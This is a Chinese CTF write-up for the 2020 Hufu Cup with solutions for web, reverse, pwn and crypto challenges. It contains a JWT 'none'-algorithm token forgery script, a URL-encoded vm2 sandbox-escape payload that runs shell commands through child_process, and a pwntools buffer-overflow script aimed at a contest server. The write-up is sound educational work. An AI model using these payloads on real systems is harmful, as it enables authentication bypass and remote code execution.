2020虎符杯wp

web

easylogin

可以看到这里jwt的key是无法控制的,那么就想办法让它为空:先注册一个账号,然后再伪造token

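const jwt = require('jsonwebtoken');

// Per the writeup, the server's signing key is looked up from a `secretid` table and the
// index comes from the token. An empty table indexed with an empty array (coerced to the
// property name '') yields `undefined`, i.e. "no secret" — exactly what a token signed
// with algorithm 'none' carries. `index` is a proper `const` (the original leaked an
// implicit global), and every statement is terminated explicitly.
const secretid = [];
const index = [];
const secret = secretid[index];
const username = 'admin';
const password = '123456';

// Payload keys must stay `secretid`, `username`, `password`: the server reads them by name.
const token = jwt.sign({ secretid, username, password }, secret, { algorithm: 'none' });
console.log(token);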

just_escape

直接上github找找看

https://github.com/patriksimek/vm2/issues/225

exp:

http://520a9401a13744a480ce9a58a8b10dfbc1e2bc9120b248f0.changame.ichunqiu.com/run.php?code=(function(){try{Buffer.from(new%20Proxy({},%20{getOwnPropertyDescriptor(){throw%20f=%3Ef[String.fromCharCode(99,111,110,115,116,114,117,99,116,111,114)](String.fromCharCode(114,101,116,117,114,110,32,112,114,111,99,101,115,115))();}}));}catch(e){return%20e(()=%3E{}).mainModule.require(String.fromCharCode(99,104,105,108,100,95,112,114,111,99,101,115,115))[`\x65\x78\x65\x63\x53\x79\x6e\x63`](`cat%20/flag`);}})()

babyupload

代码比较简单,简单说一下思路:覆盖session,用success.txt/来绕过。有个小坑,后端使用了php_binary。success.txt绕过原理

Re

enc

一个自创的对称加密算法

密钥根据一个seed随机生成,seed属于[0, 176],穷举所有密钥即可。在源程序打patch,输出全部密钥。

类似TEA,直接逆就行了

#!/usr/local/bin/python3
from struct import unpack, pack
from binascii import unhexlify
def rol4(a, n):
    """Rotate the 32-bit value ``a`` left by ``n`` bits.

    ``a`` is truncated to 32 bits first and ``n`` is reduced modulo 32, so any
    Python int is accepted for either argument. Returns an int in [0, 2**32).
    """
    mask = 0xffffffff
    a &= mask
    shift = n % 32
    left = (a << shift) & mask
    right = a >> (32 - shift)
    return left | right

def ror4(a, n):
    """Rotate the 32-bit value ``a`` right by ``n`` bits.

    ``a`` is truncated to 32 bits first and ``n`` is reduced modulo 32, so any
    Python int is accepted for either argument. Returns an int in [0, 2**32).
    """
    mask = 0xffffffff
    a &= mask
    shift = n % 32
    right = a >> shift
    left = (a << (32 - shift)) & mask
    return left | right

# The 16-byte ciphertext block as dumped; every pair of bytes is stored swapped.
res = unhexlify(b"AEED135CBDD2A1749C4C5E02D3289B60")
# Undo the pairwise swap: bytes (0,1,2,3,...) are re-emitted as (1,0,3,2,...).
res = bytes(
    byte
    for pair in zip(res[1::2], res[0::2])
    for byte in pair
)
# Four little-endian 32-bit words.
t0, t1, t2, t3 = unpack("<IIII", res)
# Strip the constant XOR applied to each word (the byte pattern 00..0f, presumably a
# final whitening step of the cipher — confirm against the binary).
t0 ^= 0x03020100
t1 ^= 0x07060504
t2 ^= 0x0b0a0908
t3 ^= 0x0f0e0d0c

def gensubkey(key):
    """Expand a 32-byte key into the 44 round subkeys used by the cipher.

    ``key`` is 32 bytes, read as eight little-endian 32-bit words. The schedule
    starts from an arithmetic sequence (0x1234567, stepping by -0x76543211) and
    then mixes the key words in over 132 steps, rotating by a data-dependent
    amount each time. Returns a list of 44 ints, each in [0, 2**32).
    """
    mask = 0xffffffff
    # Initial table: subkey[idx] = 0x1234567 - idx * 0x76543211 (mod 2**32).
    subkey = [(0x1234567 - 0x76543211 * idx) & mask for idx in range(44)]
    words = list(unpack("<IIIIIIII", key))

    acc_a = 0
    acc_b = 0
    for step in range(132):
        # Both indices wrap independently, so the table and the key words are
        # visited 3 and 16.5 times respectively over the 132 steps.
        j = step % 44
        k = step % 8
        mixed = rol4(acc_a + acc_b + subkey[j], 3)
        subkey[j] = mixed & mask
        acc_a = mixed
        # Rotation amount is data dependent (low byte of mixed + acc_b); rol4 reduces it mod 32.
        acc_b = rol4(mixed + acc_b + words[k], (mixed + acc_b) & 0xff)
        words[k] = acc_b & mask
    return subkey
# Every candidate key, one per seed in [0, 176], as printed by the patched original program.
# Each entry is passed to gensubkey as its raw 32 ASCII bytes (it is NOT hex-decoded first).
keys = [b"24f6d8e83d1eb1819c7c818cc78ac5ca", b"1ebc4541e985d612a5ff7ed2ee92bf3d", b"9f30f3d1265389805615b2bfac36b1b6", b"d83a262fc46bd9c9d48ff14208ef17bc", b"ff6c1ad0012c285b3fc3f7a2ec1e8515", b"a0c883369ea35a7d06e9b6c8648ec4f6", b"ebb73611cd81e494049b5138ab56c37d", b"a512f8ffb2c1bb775a9779ec60b699cb", b"794c87696d24d16e7b9e3dddad778c93", b"9a30cb647a6bdd7b520ee3a072881d16", b"39d1fe72a8988665a94435426ad07fe8", b"2217d88875238732bf382b84bda50ba4", b"fb898edf3f2f1fac0efbb97fd2a178ea", b"e41c3e52832d1c2a80e60e327ccbe8fc", b"228f3022de3bc44ace8409f4f75f294e", b"d774d7687f27b3b0e50f31de114ca692", b"c4c43dcec6189ccb8122fd5fbf3f679c", b"332ce785e973574a1c5fdaf3eee3f083", b"cdc824bf721df654130ed7447fb878ac", b"50fb733a0a7e81934f8e99c3285487dc", b"fd63d016360b18a01ab74dcd01b5e32c", b"bb1ec476e023a45855e93a2feeb651e9", b"341ae4bffe82aa82798d3886484179a6", b"5a1033d131eee33a129900f2657732b4", b"7fae799db421e58f7c538357da6b8dee", b"d119fabe038bc5d0496051658fd205e6", b"55a33d5286c39dbf4c0c40dc4491f21e", b"4c4aff2e5de757833006d7f55c3f2127", b"d23f782f963f91a7aa724794ddb6294d", b"38d34384be6ff6461c84ff26069042bd", b"469b514b940da6314ca789f9b97af703", b"b47039e03ac46dbe9e223a120b6c6a73", b"6bee10c18c9358dc1a35eff2e11587d8", b"b6fd2bfc138be84b2100d83699157769", b"53276c24626a58a112bb69bf05add105", b"e7a3b473ffe1ef4cf33c715cca6eae97", b"0e3548246be44a5eb9768158cd083637", b"9fbff9e7c1d1481c63f04f4a78b4156d", b"6bf2656030beb31447c71e5263c6cf06", b"9fed75e6c5a25f8fb2d9c2abe8d3c545", b"e4200a8506e3cdd8580fa119ef435f09", b"d294eca22c3b9091d471f7da163d41e9", b"cd2b0237f80a9d79a1486b6ee132d6ff", b"386fd2f6eacab77d4b3f14fb95189d13", b"accdcfdc3907dec0252af4100727c00a", b"91a0edd6e84e27d8448f53c91e163bd4", b"cbcb73d49417b1a35bd3ab2570374644", b"a4fa3d275e7e2c5523457b30e49b60d5", b"fcbba4d117ea81a2dfaf224f4edddbb9", b"3042c7b494a4668a673a82c2e28f75b0", b"2e4d991ffdbf4604b402038117c90521", b"f57e60dbe1cff37162e4deb652c3f78c", b"2ece02377026fdd5b3b228a3eebfbbfb", 
b"0f93ee20c372b4d27241fd2959480dda", b"3687b18cdcc5c9097baa95ce26d4e8c6", b"c8b9c463c33c8b9b228a1a39f5d43dcb", b"ac70ec7446064f6ab45b75c6fd059595", b"c1f2be87d7ee98cff4abc33b3454a390", b"4e70f23d8e2bd7d7ccdb5b943084ebf6", b"f315aea87b5ec23e2e34512882e4c6b3", b"10845d3ec07425b5848d7c405dc2c433", b"3aec96904612449242ca6c30680e4cda", b"4c6ca9599ae456bbe0964c0bc09e6814", b"3c2e4fa4c911d1b9fabfb9acc5f5646f", b"c8bd1bb9dc6ed74f7b1ae209f8e9bb96", b"68632ca56c4dfb0fb5d90ee2591ee0e1", b"a88168ac6b518f4de53147a31e229362", b"f33ad94e6382a342a6fa2a77af19ea71", b"bec462f71f6f042733a7fb21711b6dc3", b"cfde6078bef18fad09f074c151dc6983", b"38e0aadb60c2448ca703803feb82717a", b"0c58033640292790e3c30df1f3a48af4", b"00730ac934636a0010ab81009f455f12", b"9c82e4b2f07420c375077ba99172bc90", b"723cd0d4f8c91f94717a8878952be710", b"dfcab32070773808d5a564b541347d26", b"c6bf3c5fcc74c7d539d53b361531ad25", b"a9f4fd43870cafe48173132b54a06685", b"f1bd55532e1360ca367bfcd11d9da1e8", b"2cb6e26375d9dd176cbbadcdfed1ef01", b"984d472aa8c899e093c8900099fea567", b"c5019c891096f4a2d1969e4700d59cf6", b"8e0b4935c723042b8e272a5f4af2bcbd", b"78c23c501b1459ebd4060308b1e3470a", b"80ae416a5467394ec9e8246c57204cba", b"bc17b303cea001efd0d73a0077f0ca8d", b"f8ead2e4e48e0e02ea7197a9bbb2e717", b"9ae78a13afa27e4108327f96e0d5181e", b"faa14910e8788ae4cd6bb892a3617f33", b"c868e13f49d85bd9f22a24d7aa918111", b"ed3d4c14b6a08c5f41bd2ca1a9dbfb1d", b"2467f3d0f807fddfb312592b0d430099", b"788e17b06c0974eaa751c2c94586010f", b"f9f296b5c47e8423fe341d760b0ecb68", b"1bee110aab230ee5c820643517373033", b"d1c96021f90f595526b0e206fac2bfca", b"9e164b670d6e9435e30302c79d7e67d4", b"33f81c781fb43df581546ba52280dc0d", b"85a585974adb486cd090331b321339cf", b"8db98fec25078c37dcbf049268c764b5", b"f944b1795f336fe9ec423bcf21284325", b"5cc8410e42c7263964b8015ea08362d4", b"34158d219951456236fb49551f7f5592", b"9180db15f09ef7202b9fcb275b0a0c6e", b"9c9d8c6de377d60214a77724713ae515", b"05376348208c8aa397de220ccf4f9ad9", b"fa98f3d30ebd1a6b2618f808e4e98a47", 
b"1746307dbbf1054a1d8135470b6ddec2", b"dd56281a2454dabd7034b59ec298abb1", b"0a6ffdd84329201f882a37527f1325c0", b"9a5b5bab8cd0298f97da3ec0fbfc4f78", b"7eb5e83cb47f481591e89d7f2f9342a1", b"30898358d9af658d9f7ca450e2a4e487", b"9083f61f5d8d2d07ad30651d053ca317", b"84c1f9bffeaf71dd48199ad9afc7df27", b"0d6cb90c9e5f6ddd1bd6177fd28b717d", b"c4339ee65d981686fa56a82b5ab7c73e", b"d8cbb9cc199f35d37f6c33f998cd6365", b"b79724b8ec63340311f48f3bf4c51bb0", b"f47ec82dca15926c01a929d8da16e1dd", b"197844ed6cd00d7af8b7ec94249d8ac3", b"4f08ee4a06e90d4c10b1da67c8c26015", b"0eb7d9649ad9559722f20fa89f9556f1", b"198c298aeaca5ba58cfaaa86ceb08824", b"e0169175017d91afeab5d903ba039c67", b"e0ff9d11b02d53ef10af40d08eb77770", b"5e0bd96491d6e6fed4bcba54b495cdf6", b"02cae11ff33401ef5500811e5b27018d", b"7a949f5ba0685bc8ba9b2a1ce3c07a33", b"fd4a545916cf5326043ae43aa9b07c62", b"fcfd4adedc3f975f105a37ce01ef4078", b"1d853fc037c09cb79fb2115c2cbe464a", b"20460f9f73163602c439e0dd557d6d18", b"fe4159237ae592cc882c0ebc61575252", b"ae0a5023804ad1a0efb7ed13499f41dc", b"8828be202b557cc22325bfa820a65ece", b"a1b94b750e5f26b59052bc4feb303636", b"40d2b2192df886ca7dd05e6cdc3d7d19", b"b6b943a74b6a4c0a2cb4e3c3302b0de1", b"e17c4d02eda594e904049871d221a0e1", b"7673d74b085d0912106a0251f51b6d23", b"a0e0a9164f619e659114a5abc73db665", b"fe0ae774f7c934ea135f37a52b219303", b"31054c4605dad50efec16fb4847f80af", b"d5b035067497b5d1fd5685d44df2c98c", b"7101a2fb7faf3bd54ea188912c35e285", b"90aeb01c7009c29bacd1ccdf9198200f", b"f09b0749f63e993af94531f6dbb51ad3", b"dda5608f9b02fa74d2021080e448c514", b"1c8c736e1e6cd1d55ac64f16308e5ec6", b"1a37cb862224bbef490c3b3ce39f30fa", b"e506c5d2e2016e03648bdeef447e9121", b"a7261b0be446888c6534ed4804d42eef", b"6eb945b94729b91786b1ff7e5ca14503", b"9af243c3650ffc485a37330f4a9c268a", b"afec290d9e26eda32e10aa1274803105", b"02d4e985c69172281e0406003fbabe14", b"4507c1663d08c9c8c8df1c2b9fbd71a9", b"037aee4d7df2b014d464a499343452f4", b"eb8c9f0afc38b58de0ede9016cbff20d", b"809b984e9737401afde6611e6825aaba", 
b"4a9da6e66ffa1e0e8373f78de018734b", b"b87f131f2a50058c4aae5d6878833bf0", b"3116bc3fec1e3da39b9b1d1024fd7908", b"a4ac2a59dfd9089eeffc7d5ba914b9f6", b"1021faa46d25b5eda7cfc3fa2cf3a761", b"e58bf62b5cd2598edfbba16473bddd2d", b"9ce2084127100a7fff7362ef98b86a1c", b"eadf54f1f347a3b3d77d3b8a97a21014", b"721c06b23bb82ed9d462b983018960bd", b"4e33c627548423e79c32c144fef410e7", b"6066c9ff564d883e3b4e5ed2b799744c", b"80715b87c5282b609426baa2a1b7547c", b"9b5bf4ffa9d46bb4926cee65b18d2804", b"29c71f391557af9da8a10c2f852bde4c", b"97fd6c7964b4b65c44521b4a1495c585", b"8d2ead53c70518308cff580ba835a718"]
# Try every candidate key: re-derive the subkeys, run the 20 rounds backwards and
# print the resulting 16-byte block (the right key is the one whose output reads
# as a flag).
save = (t0, t1, t2, t3)
for key in keys:
    t0, t1, t2, t3 = save
    subkey = gensubkey(key)

    # Undo the final key addition on words 0 and 2.
    t0 = (t0 - subkey[42]) & 0xffffffff
    t2 = (t2 - subkey[43]) & 0xffffffff

    # Inverse rounds, 20 down to 1; round r consumed subkey[2r] and subkey[2r+1].
    for rnd in range(20, 0, -1):
        a, b, c, d = t0, t1, t2, t3
        # Quadratic mixing of the untouched words, rotated by 5 (same as encryption).
        fa = rol4(a * (2 * a + 1), 5)
        fc = rol4(c * (2 * c + 1), 5)
        t2 = (ror4(b - subkey[2 * rnd + 1], fa) ^ fc) & 0xffffffff
        t0 = (ror4(d - subkey[2 * rnd], fc) ^ fa) & 0xffffffff
        # The two mixing words simply shift position.
        t1 = a
        t3 = c

    # Undo the initial key addition on words 1 and 3.
    t1 = (t1 - subkey[0]) & 0xffffffff
    t3 = (t3 - subkey[1]) & 0xffffffff

    res = pack("<IIII", t0, t1, t2, t3)
    print(res)

game

python的汇编代码,基于栈结构的,比较好理解。

加密部分不复杂,z3一把梭

#/usr/local/bin/python
from z3 import *
# Expected outputs of the three checks recovered from the bytecode.
arr0 = [249, 91, 149, 113, 16, 91, 53, 41]
arr1 = [43, 1, 6, 69, 20, 62, 6, 44, 24, 113, 6, 35, 0, 3, 6, 44, 20, 22, 127, 60]
arr2 = [90, 100, 87, 109, 86, 108, 86, 105, 90, 104, 88, 102]


s = Solver()
# One 32-bit symbolic variable per flag character (39 characters in total).
x = [BitVec('x%d' % i, 32) for i in range(39)]

# Known prefix "flag{5" and the closing brace.
for pos, ch in zip(range(6), "flag{5"):
    s.add(x[pos] == ord(ch))
s.add(x[38] == ord('}'))

# Check 1: every third character from index 6 goes through an affine map mod 257.
for sym, expected in zip(x[6:30:3], arr0):
    s.add((sym * 17684 + 372511) % 257 == expected)

# Check 2: characters 37..34 (reversed), repeated five times, are XORed into x[7:27].
b = x[-2:33:-1] * 5
for lhs, rhs, expected in zip(b, x[7:27], arr1):
    s.add((lhs ^ rhs) == expected)

# Check 3: characters 28..33 each produce two bytes (a quotient and a remainder by 16).
# NOTE: "/" on a z3 BitVec is z3's division, not Python's float division.
for sym, hi, lo in zip(x[28:34], arr2[0::2], arr2[1::2]):
    s.add(((sym + 107) / 16) + 77 == hi)
    s.add(((sym + 117) % 16) + 99 == lo)

# Printable ASCII only.
for sym in x:
    s.add(sym <= 127)
    s.add(sym >= 32)

print(s.check())
m = s.model()
res = b"".join(bytes([m[sym].as_long()]) for sym in x)
print(res)

VM

基于两个栈结构的VM,加密比较简单。

z3一把梭

#!/usr/local/bin/python3
# Expected 42-byte output of the VM's encryption; the solver constrains x1 to equal it.
res = [ 0x66, 0x4E, 0xA9, 0xFD, 0x3C, 0x55, 0x90, 0x24, 0x57, 0xF6,
0x5D, 0xB1, 0x01, 0x20, 0x81, 0xFD, 0x36, 0xA9, 0x1F, 0xA1,
0x0E, 0x0D, 0x80, 0x8F, 0xCE, 0x77, 0xE8, 0x23, 0x9E, 0x27,
0x60, 0x2F, 0xA5, 0xCF, 0x1B, 0xBD, 0x32, 0xDB, 0xFF, 0x28,
0xA4, 0x5D]
from z3 import *
s = Solver()
# One 32-bit symbolic variable per flag byte (42 bytes).
x = [BitVec('x%d' % i, 32) for i in range(42)]

# Printable ASCII only.
for sym in x:
    s.add(sym <= 127)
    s.add(sym >= 32)

# Known prefix "flag{".
for pos, ch in enumerate("flag{"):
    s.add(x[pos] == ord(ch))
# s.add(x[-1] == ord('}'))

# Stage 1: transpose the 7x6 layout into 6x7 and XOR each byte with i*(j+2).
x1 = [0 for _ in range(42)]
for i in range(7):
    for j in range(6):
        x1[j * 7 + i] = x[i * 6 + j] ^ (i * (j + 2))

# Stage 2: sequential chain over the buffer — even positions absorb the (already
# updated) previous byte, odd positions are multiplied by 0x6b; everything mod 256.
for pos in range(1, 42):
    if pos % 2 == 0:
        x1[pos] = (x1[pos] + x1[pos - 1]) & 0xff
    else:
        x1[pos] = (x1[pos] * 0x6b) & 0xff

for computed, expected in zip(x1, res):
    s.add(computed == expected)

print(s.check())
m = s.model()
res = b"".join(bytes([m[sym].as_long()]) for sym in x)
print(res)

pwn

Count

from pwn import *

p = remote("39.97.210.182", 40285)

# The service asks 200 arithmetic questions of the form "Math: <expr> = " before
# it accepts the real input; answer each one.
for _ in range(200):
    p.recvuntil("Math: ")
    question = p.recvuntil("input answer:")
    expr = question.split(" = ")[0]
    print(expr)
    # NOTE: eval() executes whatever text the remote sends. Fine against this
    # known CTF box, but a hostile server could run arbitrary code here — a
    # small arithmetic-only parser would be the safe replacement.
    answer = eval(expr)
    p.sendline(str(answer))

# 0x64 bytes of padding followed by the 64-bit value 0x12235612 (presumably the
# value the service checks next — not shown in this writeup), then a fixed string.
p.sendline("a" * 0x64 + p64(0x12235612))
p.sendline("icqd222c2ed094b0a9e849d151d35e16")

p.interactive()

misc

签到

F12拿到flag

Crypto

GM

import sympy
from Crypto.Util.number import *

# Public modulus and its Euler totient as given by the challenge.
n = 9433451661749413225919414595243321311762902037908850954799703396083863718641136503053215995576558003171249192969972864840795298784730553210417983714593764557582927434784915177639731998310891168685999240937407871771369971713515313634198744616074610866924094854671900334810353127446778607137157751925680243990905528141072864168544519279897224494849206184262202130305820187569148057247731243651084258194009459936702909655448969693589800987266378249891157940262898554047247605049549997783511107373248462587318323152524969684724690316918761387154882496367769626921299091688377118938693074486325995308403232228282839975697
phi = 9433451661749413225919414595243321311762902037908850954799703396083863718641136503053215995576558003171249192969972864840795298784730553210417983714593764557582927434784915177639731998310891168685999240937407871771369971713515313634198744616074610866924094854671900334810353127446778607137157751925680243990711180904598841255660443214091848674376245163953774717113246203928244509033734184913005865837620134831142880711832256634797590773413831659733615722574830257496801417760337073484838170554497953033487131634973371143357507027731899402777169516770264218656483487045393156894832885628843858316679793205572348688820

# Knowing phi(n) gives the factors: p*q = n and p+q = n - phi + 1.
p = sympy.symbols('p')
q = sympy.symbols('q')
res = sympy.solve([p * q - n, p + q - (n - phi + 1)], (p, q))


# The factors returned above, kept as literals so the rest of the script does not
# depend on the solver's result ordering.
p = 100216711979082556377200124903474313599976321274816484378304672662900171906266478070844182716079881540999761528986068197079878654411887736955737660906283803174161740862819849415729979371880583995409044839777513091451849412985192528374337852907661670174530234397743068706607004213367391908429077794527921775907
q = 94130524494940356506875940901901506872984699033610928814269310978003376307730580667234209640309443564560267414630644861712331559440658853201804556781784493376284446426393074882942957446869925558422146677774085449915333876201669456003375126689843738090285370245240893337253184644114745083294361228182569510971

# d holds the ciphertext list (left out of the writeup because of its length).
# NOTE: with d empty, int("", 2) below raises ValueError — fill d in first.
d = []

# One ciphertext per plaintext bit: bit 0 when x is a quadratic residue mod n,
# bit 1 otherwise (the challenge name "GM" suggests Goldwasser-Micali).
# The residue test here raises x to e and checks whether the result squares back to x.
e = ((p - 1) * (q - 1) + 4) // 8
bits = []
for x in d:
    k = pow(x, e, p * q)
    bits.append("0" if pow(k, 2, p * q) == x else "1")
m = "".join(bits)
print(m)
m = int(m, 2)
print(long_to_bytes(m))